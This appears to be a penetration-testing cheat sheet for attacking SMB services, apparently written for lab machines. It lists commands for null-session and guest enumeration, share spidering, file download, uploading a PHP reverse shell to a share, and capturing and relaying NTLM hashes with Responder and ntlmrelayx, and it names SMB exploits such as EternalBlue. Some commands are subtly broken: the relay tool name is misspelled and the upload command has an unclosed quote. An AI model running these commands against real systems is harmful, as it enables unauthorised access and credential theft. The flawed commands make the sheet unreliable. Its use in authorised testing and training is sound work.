SMB

Server Message Block - Ports 445/139

If you see microsoft-ds on a port scan it means is SMB

smbclient

List Resource list

smbclient -L <IP>

Version Detection

smbclient -L //<target> -N

List Null session

smbclient -N <IP>

List User Share

smbclient //IP/<SHARE> -U <USER>

Connect to share

smbclient -N \\\\IP\Share

Without Credentials

smbclient --no-pass //IP/<Share>

Resources list + Null session

smbclient -L \\10.10.10.123 -N

Upload PHP reverse shell

smbclient -N //10.10.10.123/Development -c 'put cmd.php tokyo.php

Download a File

Type this sequence

recurse
prompt
mget *

smbmap

Connect to host

smbmap -H <IP>

Connect with credentials

smbmap -H <IP> -d <dns> -u '<user>' -p '<pass>'

List Share

smbmap -H <IP> -r <SHARE>

SAMBA

Download file

smbget -U <User> smb://IP/<SHARE_LOCATION> / --download

NetExec

Wiki

Basic

nxc smb 10.129.230.148

Scan Users Using NULL session

nxc smb 10.129.230.148 -u '' -p '' --users

Scan Shares Using Guest User

nxc smb 10.129.230.148 -u guest -p '' --shares

Spider shares using existing credentials

nxc smb IP -u "user" -p 'password' --spider Share$ --pattern .

Download a file from a share

nxc smb IP -u "user" -p 'password' --share Share$ --get-file file.example myfilenow.example

NTLM Relay Attacks

Capture the Hash

responder -I eth0 -dwv

Relay the hash

impacket-ntrlrelayx -tf target.txt -smb2support -c <payload>

SMBv1 Vulnerabilities

Major vulnerabilities

EternalBlue (MS17-010) — WannaCry/NotPetya
EternalRomance (MS17-010) — Remote code execution
EternalChampion (MS17-010) — Privilege escalation
SMBGhost (CVE-2020-0796) — Buffer overflow in SMBv3
SMBleed (CVE-2020-1206) — Memory leak vulnerability

Generate hosts file | NetExecwww.netexec.wiki